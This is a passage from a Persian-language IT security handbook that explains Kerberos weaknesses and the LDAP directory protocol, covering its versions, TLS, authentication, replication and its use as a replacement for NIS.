‫ﻛﺎﺭﻱ ﺩﺍﺭﺍﻱ ﻧﺴﺨﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ ﻫﺴﺘﻨﺪ‪.‬‬
‫‪ Kerberos‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺪﻡ ﺍﻋﺘﻤﺎﺩ ﮔﺴﺘﺮﺵﻳﺎﺑﻨﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ‬
‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﻓﺸﺎ ﺷﻮﺩ‪ ،‬ﺑﺮﺍﻱ ﻳﻚ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺍﺯ ﺁﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻜﺎﺭ ﺑﻨﺪﺩ‪.‬‬
‫‪ Kerberos‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﺁﻥ ﺑﻪ ﻭﻓﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻭ ﺍﺯ ﺁﻥ ﻣﻬﻤﺘـﺮ ﺍﻳﻨﻜـﻪ ﻣﺒـﺎﻧﻲ ﭘﺎﻳـﺔ ﺁﻥ‬
‫ﺑﺼﻮﺭﺕ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣﺴﺘﻘﻴﻢ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻧﻴﺰ ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫‪LDAP‬‬
‫ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ" )‪ ،(LDAP‬ﻳﻚ ﻧﺴﺨﺔ ﻛﻢ ﺩﺭﺩﺳﺮ ﺍﺯ ﺳﺮﻭﻳﺲ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ‪ X.500‬ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ )ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ( ﺑﺎ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﻧـﺎﻝ ﺍﻣـﻦ‬
‫ﺷﺒﻜﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺩﻭ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﺯ ‪ LDAP‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ LDAPv2 .‬ﻛﻪ ﺳﺎﻝ ‪ ۱۹۹۵‬ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۱۷۷۷‬ﺗﻮﺻﻴﻒ ﺷﺪﻩ‪ ،‬ﻣﮑﺎﻧﻴﺰﻡ‬
‫ﺍﻣﻨﻴﺘﻲ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻥ ﺩﺭ ﺗﻌﺎﻣـﻞ ﺑـﺎ ‪ Kerberos‬ﺑﺎﺷـﺪ‪ LDAPv3 .‬ﻛـﻪ ﺩﺭ‬
‫‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۲۵۱‬ﺗﻮﺻﻴﻒ ﺷﺪﻩ ﺍﺯ ‪ ١٨٠SASL‬ﻫﻢ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﺪ‪ SASL .‬ﭼﻨﺪ ﺭﻭﺵ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ )ﺍﺯ ﺟﻤﻠﻪ ‪ (!Kerberos‬ﺍﺭﺍﺋﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﻫﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﺘﻦﺑﺎﺯ ﻭ ﭘﺮ ﺍﺳﺘﻔﺎﺩﺓ ‪ (OpenLDAP 2.x) LDAPv3‬ﻭ ﻫـﻢ‬
‫ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﺠﺎﺭﻱ )‪ Active Directory‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ‪ ،‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺑﺎ ‪ Windows 2000‬ﺁﻏﺎﺯ ﺷﺪ(‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪SSL/TLS‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﻛﻞ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ -‬ﺍﺯ ﺟﻤﻠﻪ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﺭﺍ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫‪ LDAP‬ﺑﻪ ﺧﻮﺩﻱ ﺧﻮﺩ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺮﻭﻳﺴﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ‪ LDAP‬ﺑـﺮﺍﻱ‬
‫ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ‪ ،‬ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ‪ ،‬ﻭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ ﺩﺭ ﻣـﻮﺭﺩ‬
‫‪ LADP‬ﺳﺨﻦ ﻣﻲﮔﻮﻳﻴﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﺎﻳﺔ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺷﻜﻞ ﺩﻫـﺪ‪ ،‬ﻭ ﻧﻴـﺰ ﺑـﻪ ﺍﻳـﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺑﻄـﻮﺭ‬
‫ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ‪ -‬ﺑﺨﺼﻮﺹ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windwos‬ﻭ ‪ - Linux‬ﺑﺮﺍﻱ ﺑﺮﺁﻭﺭﺩﻩ ﻛﺮﺩﻥ ﺍﻳﻦ ﺍﻫﺪﺍﻑ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﭘﺮﻭﺗﻜﻞ ‪LDAP‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﺑﻪ ﺷﻜﻞ ﻳﻚ ﺩﺭﺧﺖ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﻩ ‪ -‬ﻛﻪ ﻫﺮﻳﻚ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻃﺒﻘﺔ ﺍﺷـﻴﺎ ﻭ ﺷـﺎﻣﻞ ﺻـﻔﺎﺗﻲ‬
‫ﺑﺮﺍﻱ ﻣﻘﺎﺩﻳﺮ ﺧﻮﺩ ﻫﺴﺘﻨﺪ ‪ -‬ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺮ ﻗﻠﻢ ﺩﺍﺩﻩ ﺷﺎﻣﻞ ﻳﻚ ﺻﻔﺖ ﺑﻪ ﻧﺎﻡ "‪) "cn‬ﻧﺎﻡ ﻣـﺸﺘﺮﻙ(‪ ١٨١‬ﺍﺳﺖ ﻛـﻪ ﺁﻧـﺮﺍ ﺍﺯ ﺳـﺎﻳﺮ‬
‫ﺍﻗﻼﻡ ﺑﺎ ﭘﺪﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻫﻤﺎﻥ ﺩﺭﺧﺖ ﻣﺘﻤﺎﻳﺰ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫‪180 Simple Authentication and Security Layer, RFC 2222‬‬
‫‪181 Common Name‬‬
‫‪٣٤٣‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﻩ ﻣﺘﻌﻠﻖ ﺑﻪ ﻃﺒﻘﻪ ﺷﻲﺀ "‪ "posixAccount‬ﺷﺎﻣﻞ ﺻﻔﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻧﺎﻡ ﻛﺎﻣﻞ ﻛﺎﺭﺑﺮ )‪ ،(cn‬ﻧـﺎﻡ ﻛـﺎﺭﺑﺮ ﺑـﺮﺍﻱ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ )‪ ،(uid‬ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮ ﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺔ ﮔﺮﻭﻩ )‪ uidNumber‬ﻭ ‪ ،(gidNumber‬ﺩﺍﻳﺮﻛﺘـﻮﺭﻱ ﺧﺎﻧـﻪ )‪،(homeDirectory‬‬
‫ﭘﻮﺳﺘﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ )‪ (loginShell‬ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺩﺭ ﺍﺻﻄﻼﺣﺎﺕ ‪ ،LDAP‬ﻳﻚ ﺷﻤﺎ‪ ١٨٢‬ﺑﻪ ﻣﻌﻨﺎﻱ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﮔﻮﻧﻪﻫﺎﻱ ﺍﺷﻴﺎ‪ ١٨٣‬ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘـﻲ ﻭ ﺗﻌـﺎﺭﻳﻒ ﺻـﻔﺎﺕ ﺑـﻪ ﻫـﻢ‬
‫ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ‪ .‬ﮔﻮﻧﺔ ﺷﻲﺀ ‪ posixAccount‬ﺩﺭ ﺷﻤﺎﻱ ﺳﺮﻭﻳﺲ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ )‪ (nis.schema‬ﺗﻌﺮﻳﻒ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ LDAP‬ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ‪ -‬ﺳﺮﻭﻳﺲ ﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﺓ ‪ LDAP‬ﺗﻘﺎﺿـﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪LDAP‬‬
‫ﻣﻲﻓﺮﺳﺘﺪ ﻭ ﭘﺎﺳﺨﻬﺎﻱ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﻘﺎﺿﺎﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻧﺠﺎﻡ ﺟﺴﺘﺠﻮ‪ ،‬ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳـﻚ‬
‫ﻳﺎ ﺑﻴﺸﺘﺮ ﺻﻔﺎﺕ ﻳﻚ ﻗﻠﻢ ﺩﺍﺩﺓ ﺧﺎﺹ‪ ،‬ﻭ ﻳﺎ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﻳﻚ ﺯﻳﺮ ﺩﺭﺧﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﻼﻡ ﺩﺍﺩﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻔﺮﺳﺘﻨﺪ‪.‬‬
‫ﺟﺎﻣﻌﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺪﺭﻥ ‪) LDAP‬ﻣﺜﻞ ‪ Active Directory‬ﻳـﺎ ‪ (OpenLDAP 2.x‬ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﻣﻬﻢ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺟﺎﻣﻌﻴـﺖ ﺩﺍﺩﻩ ﻭ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ‪:‬‬
‫ﺟﺎﻣﻌﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩ‬
‫‪١٨٤‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺗﺼﺎﻻﺕ ﺍﻳﻤﻦﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ‪ TLS‬ﺭﺍ ﺑﭙﺬﻳﺮﺩ‪ ،‬ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻌـﺎﻣﻼﺕ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ -‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ TLS ،‬ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ‪ ،TLS‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‬
‫ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ LDAP‬ﺑﺎ ﺁﻥ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛـﻪ ﻣـﻲﺧﻮﺍﺳـﺘﻨﺪ‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ LDAP‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ‪ TLS‬ﺑﺨﻮﺍﻫﻨـﺪ‪ ،‬ﺗـﺎ ﺗـﻀﻤﻴﻦ ﻛﻨﻨـﺪ ﻛـﻪ ﺗﻨﻬـﺎ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ﻣﺠﺎﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ query‬ﺑﻔﺮﺳﺘﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﻪ ﺭﻭﺯ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ LDAP‬ﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻡ ﻣﺨﺎﺯﻥ ﺩﺍﺩﺓ ‪ LDAP‬ﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ ﺧـﺮﺍﺏ ﺷـﺪﻥ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ ‪ LDAP‬ﺍﺯ ﺩﺳﺖ ﻧﺮﻭﺩ‪.‬‬
‫‪ LDAP‬ﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮ ﺑﺮﺍﻱ ‪ NIS‬ﻭ ‪ NIS+‬ﺍﺳﺖ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‪ ،‬ﺍﺯ ﻣﺰﺍﻳـﺎﻱ‬
‫ﺍﺻﻠﻲ ‪ LDAP‬ﺗﻮﺍﻧﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻭﺟﻮﺩ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤـﻦﺷـﺪﻩ‬
‫ﺑﻮﺳﻴﻠﺔ ‪ TLS‬ﺍﺳﺖ‪ .‬ﺍﺷﻜﺎﻝ ﺍﺻـﻠﻲ ‪ LDAP‬ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩﺗـﺮ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻳـﻚ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺳﺎﺩﻩﺳﺎﺯﻱ ﺭﺍﻫﺒﺮﻱ ‪ LDAP‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪182 Schema‬‬
‫‪183 Object Classes‬‬
‫‪184 End-to-End Encryption‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺗﻜﺜﻴﺮ‬
‫‪٣٤٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ‪LDAP‬‬
‫‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۳۰۷‬ﺷﻴﻮﻩﺍﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ LDAP‬ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ ﺗﻮﺻﻴﻒ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻳـﻦ ‪ RFC‬ﻳـﻚ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺁﻥ ﺑﻄﻮﺭ ﮔﺴﺘﺮﺩﻩﺍﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﻳﻚ ﻃﺮﺡ ﺑﺮﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ‬
‫)‪ (nis.schema‬ﺩﺭ ‪ OpenDAP 2.x‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﻃـﺮﺡ ﻳـﺎﺩ ﺷـﺪﻩ "ﮔﻮﻧـﻪﻫـﺎﻱ ﺍﺷـﻴﺎ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫)‪ posixAccount‬ﻭ ‪ ،(shadowAccount‬ﮔﺮﻭﻫﻬﺎ )‪ ،(posixGroup‬ﺧﺪﻣﺎﺕ )‪ ،(ipService‬ﭘﺮﻭﺗﻜﻠﻬﺎ )‪ ،(ipProtocol‬ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ )‪ ،(oncRPS‬ﻣﻴﺰﺑﺎﻧﻬﺎ )‪ ،(ipHost‬ﺷﺒﻜﻪﻫﺎ )‪ ،(ipNetworks‬ﮔﺮﻭﻩﻫـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ‪ (nisObject ،nisMap ،nisNetgroup) NIS‬ﻭ ﺳـﺎﻳﺮ‬
‫ﻣﻮﺍﺭﺩ ﺭﺍ ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻫﺮ ﺳﺮﻭﻳﺴﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﺗﻌﺎﻣـﻞ ﺑـﺎ ‪ LDAP‬ﻣﺠـﺪﺩﹰﺍ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ؛ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﺸﺎﺑﻪ ﺭﻭﻧـﺪ‬
‫"‪ "kerberizing‬ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ‪ Kerberos‬ﻻﺯﻡ ﺑﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻳﻲ ﻧﻈﻴـﺮ ‪ Microsoft Windows‬ﻛـﻪ‬
‫ﻫﻤﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ‪ ١٨٥‬ﻣﻨﺘﺸﺮﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩ ﻣﻲﻛﻨﺪ ﺳـﺎﺩﻩ ﺍﺳـﺖ ‪ -‬ﺍﻣـﺎ ﻫﻨـﻮﺯ ﻫـﻢ‬
‫ﺑﺎﺯﻧﻮﻳﺴﻲ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻻﺯﻡ ﺍﺳﺖ‪.‬‬
